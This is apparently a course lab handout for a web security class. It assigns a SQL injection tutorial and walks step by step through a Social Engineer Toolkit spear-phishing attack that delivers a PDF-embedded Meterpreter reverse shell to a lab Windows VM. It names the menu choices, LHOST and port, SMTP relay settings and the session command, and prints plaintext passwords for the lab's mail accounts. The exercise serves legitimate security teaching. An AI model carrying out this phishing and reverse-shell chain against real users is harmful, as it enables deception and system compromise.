Module 6: Lab Exercise

Launching Data Store and Social Engineering Attacks

MCY 670 Web Security

In this lab, you are required to complete an online tutorial on data store attacks, followed by the Social Engineering Toolkit on Kali.

Lab Report Submission Instructions

You are required to submit a lab report, which should include comments, descriptions, and explanations of each step that you
perform. You must also include a small write up on each of the segment, and the necessity of each tool that you will be exploring in
this lab task. Include screenshots of each step that you complete along with the texts in your lab report.

Submission requirements: Lab report

File format: MSWord or pdf (preferred)

Report requirements

• Include your name and lab title at the top of the report.
• Number the questions and answers and answer each question in your lab report in sequence.
• For each response, include the required text as well as all necessary and appropriate screenshots while performing the task. Crop
the screenshots as necessary so that the text in the images are properly visible.
o You may use the Snipping Tool on Windows to take screenshots from your PC, by clipping the area on the virtual machine
screen. If you are using a Mac PC, press and hold together: Shift, Command, and 4, to enable the selection cursor for
capturing screenshots.
• At the end of your report, write a brief reflection of the lab exercise
o What was the most valuable feature of the lab?
o What did you learn from this experience?
o Which concepts and terminology could you relate from the theoretical content to this lab experience?
o How did you prepare for this lab?
o What changes are you considering in preparing for your next lab?
• Use black font color for texts
• If uploading an MSWord format file, view the uploaded file from Canvas to make sure that the layout of images and texts are not
overlapping in the report. If the contents seem to have moved around, upload a pdf instead of an MSWord file.
Part 1: Online Tutorial on Data Store Attacks

You will complete a free-to-use online web-based tutorial tool on attacking data stores.

The report should include the following points for both the tutorials:

• The attacks and exploits performed on the web application.

• A short discussion on the reasons why the exploitation attempts were successful.
• The things which were done to fix the problems and remove the vulnerabilities.

Feel free to use screenshots to explain the above points in the report. However, please do not use a series of screenshots copied-
and-pasted in the report, without proper explanation. The explanations and discussions should be the primary content, and the
screenshots may be used for better illustration.

Tutorial: A Simple SQL Injection Attack

The tutorial in available at the following link: https://www.hacksplaining.com/exercises/sql-injection

Follow through with the tutorial till the end of the tutorial.

Submit a screen shot of the final page when the tutorial is complete and you see the following message:

“Phew. Now we know how SQL INJECTION works, let’s learn how to protect against this kind of attack.”
Part 2: Launching a Social Engineering Attack

Social engineering attacks exploit human-human interaction, leading to the revelation of confidential digital information. The Social
Engineer Toolkit (SET) is an automated tool with integrated features for launching social engineering attacks through various
methods. Here, we will launch a social engineering attack leading to a compromised system.

Target: Windows VM

Phase A: Setting up the Target Windows VM

Check if your Windows VM has Firefox installed already. If so, then proceed directly to “Setting up a disposable web-based email
address from your Windows VM for the target victim user”. The Windows VM may come with an old version of Internet Explorer
which does not allow HTTPS. Hence, we have to work around the limitation to have Firefox installed on our Windows VM.

Downloading and placing the correct Firefox version in an accessible location on your Kali VM
• Log in to your Kali Linux VM and open the web browser application (use the Application menu on the top-left corner)
➢ Browse to the following URL: https://ftp.mozilla.org/pub/firefox/releases/43.0/win32/en-US/
➢ Download and save Firefox Setup 43.0.exe
➢ By default, the file will be saved in your /home/student/Downloads directory.
• Open a command line terminal and run the following commands
➢ cd /home/student/Downloads (browse to the directory where the file is downloaded)
➢ mv Firefox\ Setup\ 43.0.exe Firefox43.exe (rename the file for convenience)
➢ sudo cp Firefox43.exe /usr/share/doc/firefox-esr/ (copy the file to usr/share/doc/firefox-esr)
• Next, we will install and run an open FTP server to allow us to transfer the file to the Windows VM
• Run the following commands from your command line terminal
➢ sudo apt-get install python3-pyftpdlib (install Python-based FTP server on Kali)
➢ python3 -m pyftpdlib (runs the FTP server)
➢ By default, the FTP server should start running on port 2121
➢ Do not close the command line terminal

Transferring Firefox from the Kali VM to the Windows VM

• Log in to your Windows VM and launch the WinSCP application from the Desktop with the following settings
➢ File protocol: FTP
➢ Encryption: No encryption
➢ Host name: Your_Kali_VM_IP
➢ Port number: 2121 (noted from the earlier step when the FTP server was launched on the Kali VM)
➢ Check-mark on “Anonymous Login” and click on “Login”
• Upon successful login, a new window will open with directory lists on two columns.
➢ Scroll down and find the firefox-esr directory on the right-column
➢ Drag and drop Firefox43.exe from the right-column to the left-column
➢ The transfer is complete. You may now close the WinSCP window.
➢ You may also head back to your Kali VM and terminate the FTP server (command: ctrl+c)
• Go to Start > My Documents > Firefox43.exe and install the browser application

Setting up a disposable web-based email address from your Windows VM for the target victim user
• For this social engineering attack, we will use a disposable email address, which we will access from our Windows VM.
• Log in to your Windows VM and launch the Mozilla Firefox web browser from the Desktop
• Browse to the following URL: https://www.guerrillamail.com
• You may need to add the security exception for untrusted connection.
• The top-bar will display something similar as shown in this image:
• Click on the button with the random string, and you will be able to define an email ID yourself. Click on “ set” when done.
• Use the drop-down to select a suitable email domain as per your preference.
• Your disposable email address is now set up (will be referred from this point as the victim’s email address)
• Do not close the browser window.
• You may send an email from any account to your chosen disposable email address and verify it being received here.
Phase B: Launching a Social Engineering Attack
In this phase, we will send a phishing email from our Kali VM to our targeted victim user.

• Log in your Kali VM and launch the Social Engineer Toolkit

➢ Click on the corner icon > Social Engineering Tools > Social Engineering Toolkit
• From the Social Engineering Toolkit command prompt, we will now proceed to design and launch our attack.
• You will have to enter the numbers (1 – x) for entering the choices for making the following selections one after another:
➢ Social-Engineering Attacks
➢ Spear-Phishing Attack Vectors
➢ Perform a Mass Email Attack
➢ Payload: Adobe PDF Embedded EXE Social Engineering (the payload will have an embedded executable)
➢ Use built-in BLANK PDF for attack
➢ Windows Meterpreter Reverse_TCP (we want to set up a Meterpreter session when the payload is executed)
• At this point, we have set up our attack module and payload. Next, we will now enter the details for the crafted email.
➢ LHOST: Your_Kali_VM_IP
➢ Port to connect back on: 443 (this is the default port, you may use any other port of your choice)
• Wait for the payload to be created for the reverse TCP Meterpreter session
➢ Keep the filename (you may choose to set a customized filename)
➢ E-Mail Attack Single Email Address (we chose this as we know our target victim’s email)
➢ Pre-Defined Template
➢ Choose from the options for any of the provided templates (e.g. Status Report)
➢ Send email to: Put the victim email address set up earlier in Phase A
➢ Use your own server or open relay (an attacker may set up an online SMTP service for sending emails)
• For the purpose of this lab, I have created some test accounts.
➢ Free SMTP service provider: www.smtp2go.com
▪ Username: mcy670, Password: 485toor485
➢ Free email server provider: www.mail.com
▪ Username: [email protected], Password: 485toor485
• Use the details of the pre-configured SMTP service for the following information.
➢ From address: Put in the above email address ([email protected]) which the receiver is ‘expected’ to trust.
➢ From Name: Put in any name which the receiver is ‘expected’ to trust
➢ Username for open-relay: Enter the SMTP username from above which has already been set up for you.
➢ Password for open-relay: Enter the SMTP password from above which has already been set up for you.
▪ Note: Typed passwords on Linux systems are not visible
➢ SMTP server address: mail.smtp2go.com (specified by the free SMTP service provider)
➢ Port number for SMTP server: 2525 (specified by the free SMTP service provider)
➢ High priority: no
➢ TLS support: no
• The prompt will display that the email has been sent!
• Next, the attacker (you) will set up a listener and wait for the victim user to click on the email attachment and eventually
lead to establishing the Meterpreter session.
➢ Setup a listener: yes
▪ This will launch Metasploit automatically and start listening for a reverse TCP session from the victim.
▪ You will see a confirmation that a handler has started but no session was created.
• The attacker now just has to wait for the target victim to open the email and click on the email attachment by ‘accident’!
Phase C: Exploitation
At this point, we will ‘act’ as the victim user and ‘mistakenly’ click on the email attachment, which will eventually result in the
Meterpreter session being created.

• Log in to your Windows VM and view the Firefox browser window which you had running form before.
• Wait for the inbox to refresh or manually refresh the page till you receive the email which the attacker had sent.
➢ View the email and click on the attachment.
➢ You may be asked to save the file, so proceed with the file being saved.
➢ The prompt may warn that it consists of an executable. Ignore and click on Open.
• The victim will be displayed a blank PDF file. However, the payload has already done its job!

Next, on the other end, we know that the attacker is waiting with the Meterpreter session.

• Log back in to your Kali VM.

• Notice the prompt on the command line terminal
➢ Given the victim has opened the email attachment, the prompt on the attacker’s machine should say that a
Meterpreter session was opened.
• Start the session which was established with the following command:
➢ sessions –i 1
• The prompt will now change to meterpreter>
• At this point, the attacker has successfully exploited the target victim’s system.
• Recall from the previous lab the power of Meterpreter and how it could be used to further exploit the victim’s system.
➢ Refer to the previous lab on Meterpreter and run a few commands to gather information on the exploited system.
➢ Recall that in such cases, the attacker’s first instinct is to use the migration tool to quickly switch over to a more
stable process on the victim’s system.
• What do you think will happen if the attacker does not perform the migration?